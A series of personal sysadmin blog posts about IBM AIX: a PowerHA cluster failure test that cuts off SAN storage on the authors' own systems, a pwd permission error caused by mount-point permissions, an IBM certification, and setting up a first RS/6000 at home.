DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk8         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk6         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk3         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk2         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk0         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DE3B8540   0103070411 P H hdisk5         PATH HAS FAILED
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
(..)
A39F8A49   1210235210 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
D5676F6F   1210235210 T H fscsi1         ATTACHED SCSI TARGET DEVICE ERROR
DE3B8540   1210235210 P H hdisk6         PATH HAS FAILED
D5676F6F   1210235210 T H fscsi0         ATTACHED SCSI TARGET DEVICE ERROR
DE3B8540   1210235210 P H hdisk1         PATH HAS FAILED
D5676F6F   1210235210 T H fscsi1         ATTACHED SCSI TARGET DEVICE ERROR
(..)

As you can see AIX6.1 generated a “SYSTEM DUMP” which is actually a system panic indicator. Normally AIX saves the memory image of it’s kernel on runtime to the Logical Volumes configured with “sysdump” type and then reboots. This allows investigation why the machine crashed, but here you won’t see anything. You’ve lost FC storage connectivity (even rootvg) , so it even couldn’t save it . So from where it knows it? Probably the state of the LPAR crash can be saved somewhere in POWERVM firmware area. It’s one of the RAS things in AIX/POWER. So far, so good, the HACMP/PowerHA was able to recover services…

OK, but we wanted to have a real proof, so we have performed a double-check. We suspected that VIOS can have some magic way to communicate with LPAR. We wanted exclude that factor, and we’ve performed simulation of disconnecting the FC from storage level. The initital state was stable HACMP cluster, with RG active on jkwha002d (and jkwha001d being passive), all MPIO paths to Netapp cluster (storage1, storage2) were reported as “Enabled” by “lspath”. The igroup term in Netapp concept is “inititator group” and is responsible for things like LUN masking. If you remove access to some FC WWPNs on the LUN, it is going to end-like in situation in which AIX will have hdisks point to non-existing SCSI adapters and AIX SCSI stack will get a lot of errors (FC is just wrapper around SCSI).

On the 2nd storage controller (storage2) the igroup jkwha002d_boot was controlling access to the OS level LUNs (rootvg, etc):

storage2> lun show -g jkwha002d_boot
        /vol/jkwha002d_boot/boot/rootvg   40.0g (42953867264)   (r/w, online, mapped)
storage2>

Also on 2nd storage there was an igroup responsbile for SAP and Oracle LUNs:

storage2> lun show -g jkwha002d_cluster
        /vol/sap_jw1_mirrlog/mirrlog/mirrlog01.lun      1g (1073741824)    (r/w, online, mapped)
        /vol/sap_jw1_oraarch/oraarch/oraarch01.lun     51g (54760833024)   (r/w, online, mapped)
        /vol/sap_jw1_sapdata/sapdata2/sapdata02.lun     15g (16106127360)   (r/w, online, mapped)
storage2>

The same igroup was present on 1st storage system, controlling the remaining LUNs (yes, this is active-active configuration, where reads/writes are being managed by AIX LVM/VG consisting on LUNs on two controllers):

storage1> lun show -g jkwha002d_cluster
        /vol/clus_001d_002d_hb/hb/hbvg     20m (20971520)      (r/w, online, mapped)
        /vol/sap_jw1_origlog/origlog/origlog01.lun      1g (1073741824)    (r/w, online, mapped)
        /vol/sap_jw1_sapbin/sapbin/sapbin01.lun    100g (107374182400)  (r/w, online, mapped)
        /vol/sap_jw1_sapdata/sapdata1/sapdata01.lun     15g (16106127360)   (r/w, online, mapped)
storage1>

Let’s do it:

storage1> igroup remove
usage:
igroup remove [ -f ] <initiator_group> <node> ...
  - removes node(s) from an initiator group. The node may also
    specified as its alias. See "fcp wwpn-alias" for help with aliases
    By default, if lun maps exist for the initiator group, the node is
    not removed from the group. The -f option can be used to force the
    removal.
For more information, try 'man na_igroup'
storage1>
storage1> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:de
storage1> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:e0
storage2> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:de
storage2> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:e0
storage2> igroup remove -f jkwha002d_boot c0:50:76:00:61:20:00:de
storage2> igroup remove -f jkwha002d_boot c0:50:76:00:61:20:00:e0

.. and HACMP failover won’t work. The active LPAR node (jkwha002d) is going end up in zoombie state. If you have opened SSH sessions before, everything would indicate that is working, ls on /etc, some commands utils too. But the reason is because some things are cached in AIX’s filesystem cache. Everything is going to fail with I/O errors, lspath will cry too (it won’t display all MPIO paths as failed but this is story for another post), examples:

root@jkwha002d:# topas
bash: /usr/bin/topas: There is an input or output error.
root@jkwha002d:# nmon
bash: /usr/bin/nmon: There is an input or output error.
root@jkwha002d:# lspath
Failed  hdisk0 fscsi1
Failed  hdisk1 fscsi1
Enabled hdisk0 fscsi1
Failed  hdisk1 fscsi1
Failed  hdisk0 fscsi0
Failed  hdisk1 fscsi0
Failed  hdisk0 fscsi0
Enabled hdisk1 fscsi0
Failed  hdisk2 fscsi0
Failed  hdisk2 fscsi0
Failed  hdisk2 fscsi0
Failed  hdisk2 fscsi0
Enabled hdisk2 fscsi1
Failed  hdisk2 fscsi1
Failed  hdisk2 fscsi1
Failed  hdisk2 fscsi1
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi1
Failed  hdisk4 fscsi1
Enabled hdisk5 fscsi1
Enabled hdisk6 fscsi1
Failed  hdisk7 fscsi1
Failed  hdisk8 fscsi1
Enabled hdisk3 fscsi1
Enabled hdisk4 fscsi1
Failed  hdisk5 fscsi1
Failed  hdisk6 fscsi1
Failed  hdisk7 fscsi1
Failed  hdisk8 fscsi1
Failed  hdisk3 fscsi1
Failed  hdisk4 fscsi1
Failed  hdisk5 fscsi1
Failed  hdisk6 fscsi1
Enabled hdisk7 fscsi1
Failed  hdisk8 fscsi1
Failed  hdisk3 fscsi1
Failed  hdisk4 fscsi1
Failed  hdisk5 fscsi1
Failed  hdisk6 fscsi1
Failed  hdisk7 fscsi1
Enabled hdisk8 fscsi1
Missing hdisk9 fscsi0
Missing hdisk9 fscsi0
Missing hdisk9 fscsi1
Missing hdisk9 fscsi1
root@jkwha002d:# errpt | more
IDENTIFIER TIMESTAMP  T C RESOURCE_NAME  DESCRIPTION
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
B6267342   0103074511 P H hdisk0         DISK OPERATION ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
B6267342   0103074511 P H hdisk0         DISK OPERATION ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
EA88F829   0103074511 I O SYSJ2          USER DATA I/O ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
00B984B3   0103074511 U H hdisk0         UNDETERMINED ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
B6267342   0103074511 P H hdisk0         DISK OPERATION ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW

Oracle is going to panic (which is good behaviour in my opinion):

root@jkwha002d:# tail alert_JW1.log
Mon Jan  3 07:39:21 2011
Errors in file /oracle/JW1/saptrace/background/jw1_lgwr_831500.trc:
ORA-00345: redo log write error block 7 count 1
ORA-00312: online log 13 thread 1: '/oracle/JW1/origlogA/log_g13m1.dbf'
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: -1
Additional information: 512
Mon Jan  3 07:39:23 2011
Errors in file /oracle/JW1/saptrace/background/jw1_ckpt_368764.trc:
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogA/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogB/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
Mon Jan  3 07:39:23 2011
Errors in file /oracle/JW1/saptrace/background/jw1_ckpt_368764.trc:
ORA-00221: error on write to control file
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogA/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogB/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
Mon Jan  3 07:39:23 2011
CKPT: terminating instance due to error 221
Instance terminated by CKPT, pid = 368764
root@jkwha002d:#

but what’s most interesting is that Oracle will ask AIX to write it to the alert log file – and will be available to read by commands like “tail”, but “cat” command won’t work (you won’t be able to read whole alert log file becasue you don’t have I/O!). What’s even more interesting is that you won’t see those messages after rebooting! (after kernel memory is gone!). If you don’t have I/O how you are going to write/fsync this file???

Another additional thing is that the active HACMP node still will be active, it will be handling Resource Groups, etc. Failover won’t happen. Possible solutions to this problem should be an kernel-based check that would verify that at least /etc is accesible. Why kernel-based? Because you have to have some form of heartbeat in memory (like AIX kernel module or uncachable binary always present in RAM, running in Real-Time scheduling priority) that would continuesly . If it would fail for several times it should reboot the node (that would trigger Resource Group failover to 2nd node in the cluster).

Note: typical HACMP scripting – at least in theory – is not enough, even if it would force running /sbin/halt, how can you be sure that /sbin/halt all required libc contents are in memory??

Perhaps i’ll write a part III of this article :)

-Jakub.

AIX, user gets “pwd: The file access permissions do not allow the specified action.”

Wednesday, January 12th, 2011

Just a short demonstration that file permissions matter on directories used as mount points under AIX6.1. Let’s say we have properly running system, the oracle software owner user “orand3″ can access everything (pwd and ls commands):

root@kopsxsap003d:# mount | grep 102_64
         /dev/nd3orabin   /oracle/ND3/102_64 jfs2   Dec 03 12:00 rw,log=/dev/loglv00
root@kopsxsap003d:# oslevel
6.1.0.0
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
/oracle/ND3/102_64
kopsxsap003d:orand3 3> ls | head
MOPatch
OPatch
OPatch_old
admin
assistants
bali
bin
ccr
ccr_stage
cdata
kopsxsap003d:orand3 4> logout
root@kopsxsap003d:#

Now we simulate how the underneath mount point permission affects the users after mounting:

root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64
root@kopsxsap003d:#

.
As you can see it changed ownership from orand3:dba to root:system after unmounting (because in reality after unmounting /oracle/ND3/102_64 is just a directory on higer level filesystem like /oracle or /oracle/ND3):

root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64

OK, we want to show how the normal (i.e. non-root users) react to mount point directory that is not allowing access for them:

root@kopsxsap003d:# chmod 700 /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwx------    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64
root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64

See?, after the mounting it changed to 755 orand3:dba , but underneath it is still root:system with 700. So what should do the AIX kernel perform ? Let’s see…

root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
<strong>pwd: The file access permissions do not allow the specified action.</strong>
kopsxsap003d:orand3 3> ls | head
MOPatch
OPatch
OPatch_old
admin
assistants
bali
bin
ccr
ccr_stage
cdata
kopsxsap003d:orand3 4> logout
root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwx------    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64
root@kopsxsap003d:#

As it was demonstrated underneath mount point permission DO HAVE an affect on non-root users for pwd command if they are not clearly visible. What’s even more interesting that typical libc routines for opening dir, reading dor – they works just fine. It is just a matter of pwd command.

Ok – let’s fix it…

root@kopsxsap003d:# chmod 755 /oracle/ND3/102_64
root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
/oracle/ND3/102_64
kopsxsap003d:orand3 3>

So what is really pwd command doing?

kopsxsap003d:orand3 1> type pwd
pwd is a shell builtin.
kopsxsap003d:orand3 2> echo $SHELL
/usr/bin/csh
kopsxsap003d:orand3 3> /usr/bin/pwd
/oracle/ND3
kopsxsap003d:orand3 4>

So you have an interal pwd command (for shell) but also real command in /usr/bin. Let’s see what’s happening there:

root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# chmod 700 /oracle/ND3/102_64
root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
pwd: The file access permissions do not allow the specified action.
kopsxsap003d:orand3 3> /usr/bin/pwd
pwd: The file access permissions do not allow the specified action.
kopsxsap003d:orand3 4> truss /usr/bin/pwd
execve("/usr/bin/pwd", 0x2FF22984, 0x20012ED8)   argc: 1
sbrk(0x00000000)                                = 0x2000104C
vmgetinfo(0x2FF21370, 7, 16)                    = 0
sbrk(0x00000000)                                = 0x2000104C
sbrk(0x00000004)                                = 0x2000104C
(..)
statx("/", 0x2FF21178, 176, 020)                = 0
statx("./", 0x2FF21178, 176, 020)               = 0
statx("./../", 0x2FF21010, 128, 010)            Err#13 EACCES
access("/usr/lib/nls/msg/en_US/libc.cat", 0)    = 0
_getpid()                                       = 8847484
kopen("/usr/lib/nls/msg/en_US/libc.cat", O_RDONLY) = 3
(..)
pwdkwrite(2, " p w d", 3)                               = 3
: kwrite(2, " :  ", 2)                          = 2
The file access permissions do not allow the specified action.kwrite(2, " T h e   f i l e   a c c".., 62)       = 62

(..)
_exit(1)
kopsxsap003d:orand3 5>

So the the truth is hidden in EACCES return code for the statx() syscall.

kopsxsap003d:orand3 11> cd /oracle/ND3/102_64
kopsxsap003d:orand3 12> ls | head
MOPatch
OPatch
OPatch_old
admin
assistants
bali
bin
ccr
ccr_stage
cdata
kopsxsap003d:orand3 13> ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
kopsxsap003d:orand3 14> ls -al /oracle/ND3/102_64/|head
ls: 0653-345 /oracle/ND3/102_64/..: Permission denied.
total 280
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
drwxr-x---   35 orand3   dba            4096 Aug 23 12:45 .patch_storage
drwxr-xr-x    2 orand3   dba             256 May 10 2010  MOPatch
drwxr-xr-x    7 orand3   dba            4096 Nov 16 2009  OPatch
drwxr-x---    5 orand3   dba             256 Aug 23 12:27 OPatch_old
drwxr-xr-x    3 orand3   dba             256 Aug 23 13:36 admin
drwxr-x---    7 orand3   dba             256 Aug 23 12:18 assistants
drwxr-x---    3 orand3   dba             256 Aug 23 12:18 bali
drwxr-xr-x    2 orand3   dba           16384 Aug 23 12:45 bin
kopsxsap003d:orand3 15> ls -al .
ls: 0653-341 The fil does not exist.
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
kopsxsap003d:orand3 16> ls -al .
ls: 0653-345 ./..: Permission denied.
total 280
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
drwxr-x---   35 orand3   dba            4096 Aug 23 12:45 .patch_storage
drwxr-xr-x    2 orand3   dba             256 May 10 2010  MOPatch
drwxr-xr-x    7 orand3   dba            4096 Nov 16 2009  OPatch
drwxr-x---    5 orand3   dba             256 Aug 23 12:27 OPatch_old
drwxr-xr-x    3 orand3   dba             256 Aug 23 13:36 admin
drwxr-x---    7 orand3   dba             256 Aug 23 12:18 assistants
drwxr-x---    3 orand3   dba             256 Aug 23 12:18 bali
[..]
kopsxsap003d:orand3 19> ls -ald .
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
kopsxsap003d:orand3 20> ls -ald ./..
ls: 0653-345 ./..: Permission denied.
kopsxsap003d:orand3 21> ls -ald ./../..
ls: 0653-345 ./../..: Permission denied.
kopsxsap003d:orand3 22> ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
kopsxsap003d:orand3 23>

As you saw if you are planning some non-root users (e.g. Oracle in this case) to properly work on mounted filesystems under AIX you need to have proper permissions on the mount point dir first before mounting. Ther e is no escape from this. All comes to the definition of the stat() faimiliy of system calls:

Description

       The stat subroutine obtains information about the file named by the Path parameter. Read, write, or execute
       permission for the named file is not required, but all directories listed in the path leading to the file must be
       <strong>searchable</strong>. The file information, which is a subset of the stat structure, is written to the area specified by the
       Buffer parameter.

“Searchable” for directory in UNIX means “+x” , so someone has to have execute bit set (+x) on the directory in order it to be searchable for system calls.

-J.

PowerHA failure scenario when dealing with SAN-booted LPARs – part I

Sunday, January 9th, 2011

Together with Jedrzej we’ve exposed rather interesting weaknees in IBM PowerHA 5.5 solution (in the old days it was called HACMP). Normally you would assume that in case major cataclysm such as *complete* storage disappear on the active node, PowerHA or AIX has internal mechanism to prevent downtime by switching the services to the next active node (as defined in PowerHA policies/confguration). This is starting to be really interesting when we start talking about SAN BOOT-ed AIX LPARs. As everybody knows any form of assumption is bad (this is starting to be my mantra), and as we show it here avoid this pitfall requires requires SOME PLANNING AND CONFIGURATION to avoid ending in long downtime….

The enviorniment was consisting of:

  • Two LPARs (jkwha001d = active; jkwha002d = passive) running on separate Power frames.
  • Each LPAR on each frame was protected by separate pair of VIOS (to provide redundancy for NPIV-enabled FC fabrics and enable to have Shared Ethernet Failovers).
  • AIX 6.1 TL3
  • Oracle 10gR2
  • PowerHA 5.5SP2
  • Netapp DataOntap 7.3 storage (Netapp cluster, 2 controllers) – yes, AIX LPARs are also SAN BOOT-ed from this storage
  • 1 network-based (IPv4) heartbeat
  • 1 disk-based (on FC LUN) heartbeat
  • Properly configured & running scripts for starting and stopping Oracle
  • No application monitors configured

We’ve performed two experiments:

  1. Simulating total storage losing only on jkwha001d (active one, hosting Oracle) by unmapping Virtual Fabre Channel (NPIV) host adapters (vadapters) on both VIOS protecting jkwha001d.
  2. Simulating total storage losing only on jkwha002d (active one, hosting Oracle — after failover) by forcing disconnection of jkwha002d Fibre Channel initiators (WWNs) on Netapp cluster.

both of which simulated the same thing… Virtual LPAR running without storage at all. More on result in next post…

-Jakub.

I’m IBM Certified Advanced Technical Expert now…

Sunday, January 9th, 2011

This is going to be a rather short blog post. On 17th of Dec last year (2010) I’ve passed all of the pre-requisites (5 other IBM certificates) for being “IBM Certified Advanced Technical Expert – Power Systems with AIX” (the highest [master level] credential for people working with & designing solutions with AIX, VIOS, PowerHA/HACMP, PowerVM, (D)LPARs, Linux on Power, etc)).

ibm_cate

The story is rather boring and there are only two lessons:
1) you won’t pass the required tests/certifications if don’t know this stuff deeply (each technology like PowerVM, PowerHA – at the expert level – doh! you want to be ‘Advanced Technical Expert’!).
2) deep AIX knowledge alone is not enough. You need to get the big picture and be interested in integration of everything that plays with AIX so this includes applications, storage, high-availbility, disaster recoveries, business requirements, a lot of experience of how everything interacts, etc. You need a lot of experience (years of them).

After my whole journey i can say that AIX and its surrounding ecosystem on Power is the most rock solid & mature piece of IT solution that i’ve ever worked with. There is not a lot on the market that can be compared to this solution, and this is the main factor why I’ve decided to take this route. Now, I’ll try to blog in future (if time permits) several interesting cases about Power Systems and AIX…

-Jakub.

AIX – first battle

Tuesday, June 19th, 2007

At UnixDays conference I’ve talked with many people, they fascinated me with 
AIX - so I’ve bought  one RS/6000 machine ;) But as everyone knows – single system is borring. Maybe in next year I’ll build home HACMP laboratory… :]

Yesterday my first RS/6000 (7046-B50, CHRP, PPC 375 1MB L2 cache, rack) server appeared in my house. Then it started(keep in mind that this was my first look at this OS):

0) It seems that right serial com parameteres are 9600 8N1 for SMS

1) AIX was not installed, the firmware was outdated, chaning default boot order in SMS

2) trying to install AIX5.3 (with outdated firmware) – yeah, I know that this won’t work, but wanted to check what happens ;)

3) step “2″ failed ;)

4) updating firmware to the lastest one, reseting SMS to defaults, having lots of fun with OpenFirmware (getting familiar with this damn PCI logical tree) — and finally I’ve learned that space for O/F makes big diffrence, eg.

0> " scsi" select-dev ok

1> show-children ok

5) installing AIX again

6) ouch, some packages are missing on CD, google says that this is normal behaviour… hm (strictly speaking missing “devices.pci.ethernet” makes bad feelings…)

7)  the install halted after displaying missing packages stage? power off, power on, back to section 5

8) left install running on ”missing packages” stage

9)  finally AIX boots from SCSI drive! yeah! but why the heck install_assistant is not running? why i can’t login via console login?

10) … time passess … while having fun with rescue mode from CD and rootvg imported from internal SCSI id=2 drive ;) I love reading man pages… especially without less(1).

11) google says that I should be using real null-modem cable for serial login (full DTR,DSR & CD swapped). Hm, cisco null-modem  doesn’t work either. Damn, damn IBM!

12) back to 10

13) as i said - go back to 10 :)

14) TERM=vt100 smitty chdev seems not remeber RUNTIME & LOGIN console parameteres even without making them instant(just saving in OBM). Maybe it is altering CD’s OBM one ?

15) go back to 10

16) it seems that the sollution is to put some little script (i’ve called it /doit.sh – remember to make it chmod +x !!) with persistent (-P) option to chdev for tty0 (adding clocal to RUNTIME & LOCAL tty0 settings, I’ve also put there chdev line to enable login on this damn tty0 console). I’ve also setup a root password for sure (don’t know is this necessary).

17) sync; sync; sync; reboot (this time test from real SCSI install)

18) GREAT! I CAN LOGIN!

19) # install_assistant - piece of cake, even if this is my first install…

20) everything would be great if my 100mbps IBM PCI ethernet card (internal one, this box has two of them) wouldn’t drop 30-60% packets. It seems it has auto-negotiated 100mbps FDX (info from switch, smitty, lsattr, …).

21) Having fun: altering TRANSMIT/RECIVE HW queues on ent0… nothing happens (same drops with ping -i 0.1 from linux box)

22) Temporary solution: forcing ent0 to become 10mbps HD.

23) Ha! Now I can telnet in without problems (without “connection reset by peer” type erros)
Screenshot from AIX (after telneting in)

24) Move this loud box from front of me to it’s own place: TO DEXTER’S LABORATORIES ( => basement ). Now, much better… I hate sound of SCSI drives :/